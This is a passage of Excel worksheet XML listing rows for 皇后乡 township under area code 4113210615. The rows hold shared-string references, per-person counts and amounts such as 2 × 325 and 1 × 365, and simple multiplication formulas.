      <c r="F1854" s="24" t="str">
        <f>F1853</f>
        <v>4113210615</v>
      </c>
      <c r="G1854" s="24"/>
      <c r="H1854" s="24"/>
      <c r="I1854" s="24">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="J1854" s="24"/>
      <c r="K1854" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1855" customHeight="1" spans="1:11">
      <c r="A1855" s="23" t="s">
        <v>4965</v>
      </c>
      <c r="B1855" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1855" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1855" s="24" t="s">
        <v>4966</v>
      </c>
      <c r="E1855" s="24" t="s">
        <v>4967</v>
      </c>
      <c r="F1855" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1855" s="24">
        <v>2</v>
      </c>
      <c r="H1855" s="25">
        <v>325</v>
      </c>
      <c r="I1855" s="24">
        <f t="shared" si="28"/>
        <v>650</v>
      </c>
      <c r="J1855" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1855" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1856" customHeight="1" spans="1:11">
      <c r="A1856" s="23" t="s">
        <v>4968</v>
      </c>
      <c r="B1856" s="24" t="str">
        <f>B1855</f>
        <v>皇后乡</v>
      </c>
      <c r="C1856" s="24" t="str">
        <f>C1855</f>
        <v>皇后乡</v>
      </c>
      <c r="D1856" s="23" t="s">
        <v>4969</v>
      </c>
      <c r="E1856" s="23" t="s">
        <v>4970</v>
      </c>
      <c r="F1856" s="24" t="str">
        <f>F1855</f>
        <v>4113210615</v>
      </c>
      <c r="G1856" s="24"/>
      <c r="H1856" s="24"/>
      <c r="I1856" s="24">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="J1856" s="24"/>
      <c r="K1856" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1857" customHeight="1" spans="1:11">
      <c r="A1857" s="23" t="s">
        <v>4971</v>
      </c>
      <c r="B1857" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1857" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1857" s="24" t="s">
        <v>4972</v>
      </c>
      <c r="E1857" s="24" t="s">
        <v>4973</v>
      </c>
      <c r="F1857" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1857" s="24">
        <v>2</v>
      </c>
      <c r="H1857" s="25">
        <v>325</v>
      </c>
      <c r="I1857" s="24">
        <f t="shared" si="28"/>
        <v>650</v>
      </c>
      <c r="J1857" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1857" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1858" customHeight="1" spans="1:11">
      <c r="A1858" s="23" t="s">
        <v>4974</v>
      </c>
      <c r="B1858" s="24" t="str">
        <f>B1857</f>
        <v>皇后乡</v>
      </c>
      <c r="C1858" s="24" t="str">
        <f>C1857</f>
        <v>皇后乡</v>
      </c>
      <c r="D1858" s="23" t="s">
        <v>4975</v>
      </c>
      <c r="E1858" s="23" t="s">
        <v>4976</v>
      </c>
      <c r="F1858" s="24" t="str">
        <f>F1857</f>
        <v>4113210615</v>
      </c>
      <c r="G1858" s="24"/>
      <c r="H1858" s="24"/>
      <c r="I1858" s="24">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="J1858" s="24"/>
      <c r="K1858" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1859" customHeight="1" spans="1:11">
      <c r="A1859" s="23" t="s">
        <v>4977</v>
      </c>
      <c r="B1859" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1859" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1859" s="24" t="s">
        <v>4978</v>
      </c>
      <c r="E1859" s="24" t="s">
        <v>4979</v>
      </c>
      <c r="F1859" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1859" s="24">
        <v>2</v>
      </c>
      <c r="H1859" s="25">
        <v>325</v>
      </c>
      <c r="I1859" s="24">
        <f t="shared" si="28"/>
        <v>650</v>
      </c>
      <c r="J1859" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1859" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1860" customHeight="1" spans="1:11">
      <c r="A1860" s="23" t="s">
        <v>4980</v>
      </c>
      <c r="B1860" s="24" t="str">
        <f>B1859</f>
        <v>皇后乡</v>
      </c>
      <c r="C1860" s="24" t="str">
        <f>C1859</f>
        <v>皇后乡</v>
      </c>
      <c r="D1860" s="23" t="s">
        <v>4981</v>
      </c>
      <c r="E1860" s="23" t="s">
        <v>4872</v>
      </c>
      <c r="F1860" s="24" t="str">
        <f>F1859</f>
        <v>4113210615</v>
      </c>
      <c r="G1860" s="24"/>
      <c r="H1860" s="24"/>
      <c r="I1860" s="24">
        <f t="shared" ref="I1860:I1923" si="29">H1860*G1860</f>
        <v>0</v>
      </c>
      <c r="J1860" s="24"/>
      <c r="K1860" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1861" customHeight="1" spans="1:11">
      <c r="A1861" s="23" t="s">
        <v>4982</v>
      </c>
      <c r="B1861" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1861" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1861" s="24" t="s">
        <v>4983</v>
      </c>
      <c r="E1861" s="24" t="s">
        <v>4797</v>
      </c>
      <c r="F1861" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1861" s="24">
        <v>1</v>
      </c>
      <c r="H1861" s="25">
        <v>365</v>
      </c>
      <c r="I1861" s="24">
        <f t="shared" si="29"/>
        <v>365</v>
      </c>
      <c r="J1861" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1861" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1862" customHeight="1" spans="1:11">
      <c r="A1862" s="23" t="s">
        <v>4984</v>
      </c>
      <c r="B1862" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1862" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1862" s="24" t="s">
        <v>4985</v>
      </c>
      <c r="E1862" s="24" t="s">
        <v>2199</v>
      </c>
      <c r="F1862" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1862" s="24">
        <v>2</v>
      </c>
      <c r="H1862" s="25">
        <v>325</v>
      </c>
      <c r="I1862" s="24">
        <f t="shared" si="29"/>
        <v>650</v>
      </c>
      <c r="J1862" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1862" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1863" customHeight="1" spans="1:11">
      <c r="A1863" s="23" t="s">
        <v>4986</v>
      </c>
      <c r="B1863" s="24" t="str">
        <f>B1862</f>
        <v>皇后乡</v>
      </c>
      <c r="C1863" s="24" t="str">
        <f>C1862</f>
        <v>皇后乡</v>
      </c>
      <c r="D1863" s="23" t="s">
        <v>4987</v>
      </c>
      <c r="E1863" s="23" t="s">
        <v>4877</v>
      </c>
      <c r="F1863" s="24" t="str">
        <f>F1862</f>
        <v>4113210615</v>
      </c>
      <c r="G1863" s="24"/>
      <c r="H1863" s="24"/>
      <c r="I1863" s="24">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="J1863" s="24"/>
      <c r="K1863" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1864" customHeight="1" spans="1:11">
      <c r="A1864" s="23" t="s">
        <v>4988</v>
      </c>
      <c r="B1864" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1864" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1864" s="24" t="s">
        <v>4989</v>
      </c>
      <c r="E1864" s="24" t="s">
        <v>4990</v>
      </c>
      <c r="F1864" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1864" s="24">
        <v>2</v>
      </c>
      <c r="H1864" s="25">
        <v>325</v>
      </c>
      <c r="I1864" s="24">
        <f t="shared" si="29"/>
        <v>650</v>
      </c>
      <c r="J1864" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1864" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1865" customHeight="1" spans="1:11">
      <c r="A1865" s="23" t="s">
        <v>4991</v>
      </c>
      <c r="B1865" s="24" t="str">
        <f>B1864</f>
        <v>皇后乡</v>
      </c>
      <c r="C1865" s="24" t="str">
        <f>C1864</f>
        <v>皇后乡</v>
      </c>
      <c r="D1865" s="23" t="s">
        <v>4992</v>
      </c>
      <c r="E1865" s="23" t="s">
        <v>4993</v>
      </c>
      <c r="F1865" s="24" t="str">
        <f>F1864</f>
        <v>4113210615</v>
      </c>
      <c r="G1865" s="24"/>
      <c r="H1865" s="24"/>
      <c r="I1865" s="24">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="J1865" s="24"/>
      <c r="K1865" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1866" customHeight="1" spans="1:11">
      <c r="A1866" s="23" t="s">
        <v>4994</v>
      </c>
      <c r="B1866" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1866" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1866" s="24" t="s">
        <v>4995</v>
      </c>
      <c r="E1866" s="24" t="s">
        <v>4738</v>
      </c>
      <c r="F1866" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1866" s="24">
        <v>2</v>
      </c>
      <c r="H1866" s="25">
        <v>325</v>
      </c>
      <c r="I1866" s="24">
        <f t="shared" si="29"/>
        <v>650</v>
      </c>
      <c r="J1866" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1866" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1867" customHeight="1" spans="1:11">
      <c r="A1867" s="23" t="s">
        <v>4996</v>
      </c>
      <c r="B1867" s="24" t="str">
        <f>B1866</f>
        <v>皇后乡</v>
      </c>
      <c r="C1867" s="24" t="str">
        <f>C1866</f>
        <v>皇后乡</v>
      </c>
      <c r="D1867" s="23" t="s">
        <v>4997</v>
      </c>
      <c r="E1867" s="23" t="s">
        <v>3832</v>
      </c>
      <c r="F1867" s="24" t="str">
        <f>F1866</f>
        <v>4113210615</v>
      </c>
      <c r="G1867" s="24"/>
      <c r="H1867" s="24"/>
      <c r="I1867" s="24">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="J1867" s="24"/>
      <c r="K1867" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1868" customHeight="1" spans="1:11">
      <c r="A1868" s="23" t="s">
        <v>4998</v>
      </c>
      <c r="B1868" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1868" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1868" s="24" t="s">
        <v>4999</v>
      </c>
      <c r="E1868" s="24" t="s">
        <v>5000</v>
      </c>
      <c r="F1868" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1868" s="24">
        <v>2</v>
      </c>
      <c r="H1868" s="25">
        <v>325</v>
      </c>
      <c r="I1868" s="24">
        <f t="shared" si="29"/>
        <v>650</v>
      </c>
      <c r="J1868" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1868" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1869" customHeight="1" spans="1:11">
      <c r="A1869" s="23" t="s">
        <v>5001</v>
      </c>
      <c r="B1869" s="24" t="str">
        <f>B1868</f>
        <v>皇后乡</v>
      </c>
      <c r="C1869" s="24" t="str">
        <f>C1868</f>
        <v>皇后乡</v>
      </c>
      <c r="D1869" s="23" t="s">
        <v>5002</v>
      </c>
      <c r="E1869" s="23" t="s">
        <v>4887</v>
      </c>
      <c r="F1869" s="24" t="str">
        <f>F1868</f>
        <v>4113210615</v>
      </c>
      <c r="G1869" s="24"/>
      <c r="H1869" s="24"/>
      <c r="I1869" s="24">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="J1869" s="24"/>
      <c r="K1869" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1870" customHeight="1" spans="1:11">
      <c r="A1870" s="23" t="s">
        <v>5003</v>
      </c>
      <c r="B1870" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1870" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1870" s="24" t="s">
        <v>5004</v>
      </c>
      <c r="E1870" s="24" t="s">
        <v>4825</v>
      </c>
      <c r="F1870" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1870" s="24">
        <v>2</v>
      </c>
      <c r="H1870" s="25">
        <v>325</v>
      </c>
      <c r="I1870" s="24">
        <f t="shared" si="29"/>
        <v>650</v>
      </c>
      <c r="J1870" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1870" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1871" customHeight="1" spans="1:11">
      <c r="A1871" s="23" t="s">
        <v>5005</v>
      </c>
      <c r="B1871" s="24" t="str">
        <f>B1870</f>
        <v>皇后乡</v>
      </c>
      <c r="C1871" s="24" t="str">
        <f>C1870</f>
        <v>皇后乡</v>
      </c>
      <c r="D1871" s="23" t="s">
        <v>5006</v>
      </c>
      <c r="E1871" s="23" t="s">
        <v>4970</v>
      </c>
      <c r="F1871" s="24" t="str">
        <f>F1870</f>
        <v>4113210615</v>
      </c>
      <c r="G1871" s="24"/>
      <c r="H1871" s="24"/>
      <c r="I1871" s="24">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="J1871" s="24"/>
      <c r="K1871" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1872" customHeight="1" spans="1:11">
      <c r="A1872" s="23" t="s">
        <v>5007</v>
      </c>
      <c r="B1872" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1872" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1872" s="24" t="s">
        <v>5008</v>
      </c>
      <c r="E1872" s="24" t="s">
        <v>5000</v>
      </c>
      <c r="F1872" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1872" s="24">
        <v>2</v>
      </c>
      <c r="H1872" s="25">
        <v>325</v>
      </c>
      <c r="I1872" s="24">
        <f t="shared" si="29"/>
        <v>650</v>
      </c>
      <c r="J1872" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1872" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1873" customHeight="1" spans="1:11">
      <c r="A1873" s="23" t="s">
        <v>5009</v>
      </c>
      <c r="B1873" s="24" t="str">
        <f>B1872</f>
        <v>皇后乡</v>
      </c>
      <c r="C1873" s="24" t="str">
        <f>C1872</f>
        <v>皇后乡</v>
      </c>
      <c r="D1873" s="23" t="s">
        <v>5010</v>
      </c>
      <c r="E1873" s="23" t="s">
        <v>3644</v>
      </c>
      <c r="F1873" s="24" t="str">
        <f>F1872</f>
        <v>4113210615</v>
      </c>
      <c r="G1873" s="24"/>
      <c r="H1873" s="24"/>
      <c r="I1873" s="24">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="J1873" s="24"/>
      <c r="K1873" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1874" customHeight="1" spans="1:11">
      <c r="A1874" s="23" t="s">
        <v>5011</v>
      </c>
      <c r="B1874" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1874" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1874" s="24" t="s">
        <v>5012</v>
      </c>
      <c r="E1874" s="24" t="s">
        <v>5000</v>
      </c>
      <c r="F1874" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1874" s="24">
        <v>2</v>
      </c>
      <c r="H1874" s="25">
        <v>325</v>
      </c>
      <c r="I1874" s="24">
        <f t="shared" si="29"/>
        <v>650</v>
      </c>
      <c r="J1874" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1874" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1875" customHeight="1" spans="1:11">
      <c r="A1875" s="23" t="s">
        <v>5013</v>
      </c>
      <c r="B1875" s="24" t="str">
        <f>B1874</f>
        <v>皇后乡</v>
      </c>
      <c r="C1875" s="24" t="str">
        <f>C1874</f>
        <v>皇后乡</v>
      </c>
      <c r="D1875" s="23" t="s">
        <v>5014</v>
      </c>
      <c r="E1875" s="23" t="s">
        <v>5015</v>
      </c>
      <c r="F1875" s="24" t="str">
        <f>F1874</f>
        <v>4113210615</v>
      </c>
      <c r="G1875" s="24"/>
      <c r="H1875" s="24"/>
      <c r="I1875" s="24">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="J1875" s="24"/>
      <c r="K1875" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1876" customHeight="1" spans="1:11">
      <c r="A1876" s="23" t="s">
        <v>5016</v>
      </c>
      <c r="B1876" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1876" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1876" s="24" t="s">
        <v>5017</v>
      </c>
      <c r="E1876" s="24" t="s">
        <v>4903</v>
      </c>
      <c r="F1876" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1876" s="24">
        <v>2</v>
      </c>
      <c r="H1876" s="25">
        <v>325</v>
      </c>
      <c r="I1876" s="24">
        <f t="shared" si="29"/>
        <v>650</v>
      </c>
      <c r="J1876" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1876" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1877" customHeight="1" spans="1:11">
      <c r="A1877" s="23" t="s">
        <v>5018</v>
      </c>
      <c r="B1877" s="24" t="str">
        <f>B1876</f>
        <v>皇后乡</v>
      </c>
      <c r="C1877" s="24" t="str">
        <f>C1876</f>
        <v>皇后乡</v>
      </c>
      <c r="D1877" s="23" t="s">
        <v>5019</v>
      </c>
      <c r="E1877" s="23" t="s">
        <v>4847</v>
      </c>
      <c r="F1877" s="24" t="str">
        <f>F1876</f>
        <v>4113210615</v>
      </c>
      <c r="G1877" s="24"/>
      <c r="H1877" s="24"/>
      <c r="I1877" s="24">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="J1877" s="24"/>
      <c r="K1877" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1878" customHeight="1" spans="1:11">
      <c r="A1878" s="23" t="s">
        <v>5020</v>
      </c>
      <c r="B1878" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1878" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1878" s="24" t="s">
        <v>5021</v>
      </c>
      <c r="E1878" s="24" t="s">
        <v>4764</v>
      </c>
      <c r="F1878" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1878" s="24">
        <v>3</v>
      </c>
      <c r="H1878" s="25">
        <v>290</v>
      </c>
      <c r="I1878" s="24">
        <f t="shared" si="29"/>
        <v>870</v>
      </c>
      <c r="J1878" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1878" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1879" customHeight="1" spans="1:11">
      <c r="A1879" s="23" t="s">
        <v>5022</v>
      </c>
      <c r="B1879" s="24" t="str">
        <f>B1878</f>
        <v>皇后乡</v>
      </c>
      <c r="C1879" s="24" t="str">
        <f>C1878</f>
        <v>皇后乡</v>
      </c>
      <c r="D1879" s="23" t="s">
        <v>5023</v>
      </c>
      <c r="E1879" s="23" t="s">
        <v>4732</v>
      </c>
      <c r="F1879" s="24" t="str">
        <f>F1878</f>
        <v>4113210615</v>
      </c>
      <c r="G1879" s="24"/>
      <c r="H1879" s="24"/>
      <c r="I1879" s="24">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="J1879" s="24"/>
      <c r="K1879" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1880" customHeight="1" spans="1:11">
      <c r="A1880" s="23" t="s">
        <v>5024</v>
      </c>
      <c r="B1880" s="24" t="str">
        <f>B1879</f>
        <v>皇后乡</v>
      </c>
      <c r="C1880" s="24" t="str">
        <f>C1879</f>
        <v>皇后乡</v>
      </c>
      <c r="D1880" s="32" t="s">
        <v>5025</v>
      </c>
      <c r="E1880" s="32" t="s">
        <v>5026</v>
      </c>
      <c r="F1880" s="24" t="str">
        <f>F1879</f>
        <v>4113210615</v>
      </c>
      <c r="G1880" s="24"/>
      <c r="H1880" s="24"/>
      <c r="I1880" s="24">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="J1880" s="24"/>
      <c r="K1880" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1881" customHeight="1" spans="1:11">
      <c r="A1881" s="23" t="s">
        <v>5027</v>
      </c>
      <c r="B1881" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1881" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1881" s="24" t="s">
        <v>5028</v>
      </c>
      <c r="E1881" s="24" t="s">
        <v>5029</v>
      </c>
      <c r="F1881" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1881" s="24">
        <v>2</v>
      </c>
      <c r="H1881" s="25">
        <v>325</v>
      </c>
      <c r="I1881" s="24">
        <f t="shared" si="29"/>
        <v>650</v>
      </c>
      <c r="J1881" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1881" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1882" customHeight="1" spans="1:11">
      <c r="A1882" s="23" t="s">
        <v>5030</v>
      </c>
      <c r="B1882" s="24" t="str">
        <f>B1881</f>
        <v>皇后乡</v>
      </c>
      <c r="C1882" s="24" t="str">
        <f>C1881</f>
        <v>皇后乡</v>
      </c>
      <c r="D1882" s="23" t="s">
        <v>5031</v>
      </c>
      <c r="E1882" s="23" t="s">
        <v>5032</v>
      </c>
      <c r="F1882" s="24" t="str">
        <f>F1881</f>
        <v>4113210615</v>
      </c>
      <c r="G1882" s="24"/>
      <c r="H1882" s="24"/>
      <c r="I1882" s="24">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="J1882" s="24"/>
      <c r="K1882" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1883" customHeight="1" spans="1:11">
      <c r="A1883" s="23" t="s">
        <v>5033</v>
      </c>
      <c r="B1883" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1883" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1883" s="24" t="s">
        <v>5034</v>
      </c>
      <c r="E1883" s="24" t="s">
        <v>4850</v>
      </c>
      <c r="F1883" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1883" s="24">
        <v>2</v>
      </c>
      <c r="H1883" s="25">
        <v>325</v>
      </c>
      <c r="I1883" s="24">
        <f t="shared" si="29"/>
        <v>650</v>
      </c>
      <c r="J1883" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1883" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1884" customHeight="1" spans="1:11">
      <c r="A1884" s="23" t="s">
        <v>5035</v>
      </c>
      <c r="B1884" s="24" t="str">
        <f>B1883</f>
        <v>皇后乡</v>
      </c>
      <c r="C1884" s="24" t="str">
        <f>C1883</f>
        <v>皇后乡</v>
      </c>
      <c r="D1884" s="23" t="s">
        <v>5036</v>
      </c>
      <c r="E1884" s="85" t="s">
        <v>4935</v>
      </c>
      <c r="F1884" s="24" t="str">
        <f>F1883</f>
        <v>4113210615</v>
      </c>
      <c r="G1884" s="24"/>
      <c r="H1884" s="24"/>
      <c r="I1884" s="24">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="J1884" s="24"/>
      <c r="K1884" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1885" customHeight="1" spans="1:11">
      <c r="A1885" s="23" t="s">
        <v>5037</v>
      </c>
      <c r="B1885" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1885" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1885" s="24" t="s">
        <v>5038</v>
      </c>
      <c r="E1885" s="24" t="s">
        <v>5039</v>
      </c>
      <c r="F1885" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1885" s="24">
        <v>2</v>
      </c>
      <c r="H1885" s="25">
        <v>325</v>
      </c>
      <c r="I1885" s="24">
        <f t="shared" si="29"/>
        <v>650</v>
      </c>
      <c r="J1885" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1885" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1886" customHeight="1" spans="1:11">
      <c r="A1886" s="23" t="s">
        <v>5040</v>
      </c>
      <c r="B1886" s="24" t="str">
        <f>B1885</f>
        <v>皇后乡</v>
      </c>
      <c r="C1886" s="24" t="str">
        <f>C1885</f>
        <v>皇后乡</v>
      </c>
      <c r="D1886" s="23" t="s">
        <v>5041</v>
      </c>
      <c r="E1886" s="23" t="s">
        <v>5042</v>
      </c>
      <c r="F1886" s="24" t="str">
        <f>F1885</f>
        <v>4113210615</v>
      </c>
      <c r="G1886" s="24"/>
      <c r="H1886" s="24"/>
      <c r="I1886" s="24">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="J1886" s="24"/>
      <c r="K1886" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1887" customHeight="1" spans="1:11">
      <c r="A1887" s="23" t="s">
        <v>5043</v>
      </c>
      <c r="B1887" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1887" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1887" s="24" t="s">
        <v>5044</v>
      </c>
      <c r="E1887" s="24" t="s">
        <v>4709</v>
      </c>
      <c r="F1887" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1887" s="24">
        <v>2</v>
      </c>
      <c r="H1887" s="25">
        <v>325</v>
      </c>
      <c r="I1887" s="24">
        <f t="shared" si="29"/>
        <v>650</v>
      </c>
      <c r="J1887" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1887" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1888" customHeight="1" spans="1:11">
      <c r="A1888" s="23" t="s">
        <v>5045</v>
      </c>
      <c r="B1888" s="24" t="str">
        <f>B1887</f>
        <v>皇后乡</v>
      </c>
      <c r="C1888" s="24" t="str">
        <f>C1887</f>
        <v>皇后乡</v>
      </c>
      <c r="D1888" s="23" t="s">
        <v>5046</v>
      </c>
      <c r="E1888" s="23" t="s">
        <v>5047</v>
      </c>
      <c r="F1888" s="24" t="str">
        <f>F1887</f>
        <v>4113210615</v>
      </c>
      <c r="G1888" s="24"/>
      <c r="H1888" s="24"/>
      <c r="I1888" s="24">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="J1888" s="24"/>
      <c r="K1888" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1889" customHeight="1" spans="1:11">
      <c r="A1889" s="23" t="s">
        <v>5048</v>
      </c>
      <c r="B1889" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1889" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1889" s="24" t="s">
        <v>5049</v>
      </c>
      <c r="E1889" s="24" t="s">
        <v>4743</v>
      </c>
      <c r="F1889" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1889" s="24">
        <v>1</v>
      </c>
      <c r="H1889" s="25">
        <v>365</v>
      </c>
      <c r="I1889" s="24">
        <f t="shared" si="29"/>
        <v>365</v>
      </c>
      <c r="J1889" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1889" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1890" customHeight="1" spans="1:11">
      <c r="A1890" s="23" t="s">
        <v>5050</v>
      </c>
      <c r="B1890" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1890" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1890" s="24" t="s">
        <v>5051</v>
      </c>
      <c r="E1890" s="24" t="s">
        <v>4727</v>
      </c>
      <c r="F1890" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1890" s="24">
        <v>1</v>
      </c>
      <c r="H1890" s="25">
        <v>365</v>
      </c>
      <c r="I1890" s="24">
        <f t="shared" si="29"/>
        <v>365</v>
      </c>
      <c r="J1890" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1890" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1891" customHeight="1" spans="1:11">
      <c r="A1891" s="23" t="s">
        <v>5052</v>
      </c>
      <c r="B1891" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1891" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1891" s="24" t="s">
        <v>5053</v>
      </c>
      <c r="E1891" s="24" t="s">
        <v>4887</v>
      </c>
      <c r="F1891" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1891" s="24">
        <v>1</v>
      </c>
      <c r="H1891" s="25">
        <v>365</v>
      </c>
      <c r="I1891" s="24">
        <f t="shared" si="29"/>
        <v>365</v>
      </c>
      <c r="J1891" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1891" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1892" customHeight="1" spans="1:11">
      <c r="A1892" s="23" t="s">
        <v>5054</v>
      </c>
      <c r="B1892" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1892" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1892" s="24" t="s">
        <v>5055</v>
      </c>
      <c r="E1892" s="24" t="s">
        <v>4811</v>
      </c>
      <c r="F1892" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1892" s="24">
        <v>1</v>
      </c>
      <c r="H1892" s="25">
        <v>365</v>
      </c>
      <c r="I1892" s="24">
        <f t="shared" si="29"/>
        <v>365</v>
      </c>
      <c r="J1892" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1892" s="24" t="s">
        <v>225</v>
      </c>
    </row>
